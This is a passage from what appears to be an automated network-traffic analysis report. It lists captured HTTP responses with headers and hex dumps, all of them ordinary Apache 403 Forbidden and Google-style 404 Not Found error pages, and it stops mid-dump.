Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 78.159.97.210 Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 13:00:59 GMTServer: ApacheX-BP-NSA-REQID: (null) a.14UID=82X-Content-Type-Options: nosniffX-Frame-Options: sameoriginUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Sun, 21 Jun 2020 03:37:25 GMTETag: "1bbf-5a88fd839a740"Accept-Ranges: bytesContent-Length: 7103Vary: Accept-EncodingKeep-Alive: timeout=4, max=500Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 2d 68 6f 72 22 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6d 69 72 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 69 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 33 20 64 61 79 73 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 68 65 69 67 68 74 3d 64 65 76 69 63 65 2d 68 65 69 67 68 74 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 70 6c 61 63 65 64 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2d 33 32 78 33 32 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 33 32 78 33 32 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:00:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:02 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 13:01:02 GMTServer: Apache/2.4.38 (Debian)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 37 38 2e 31 35 39 2e 39 37 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 78.159.97.210 Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:04 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:09 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 29 Sep 2022 13:01:12 GMTServer: Apache/2.4.38 (Debian)Content-Length: 278Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 37 38 2e 31 35 39 2e 39 37 2e 32 31 30 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 78.159.97.210 Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1595Date: Thu, 29 Sep 2022 13:01:14 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 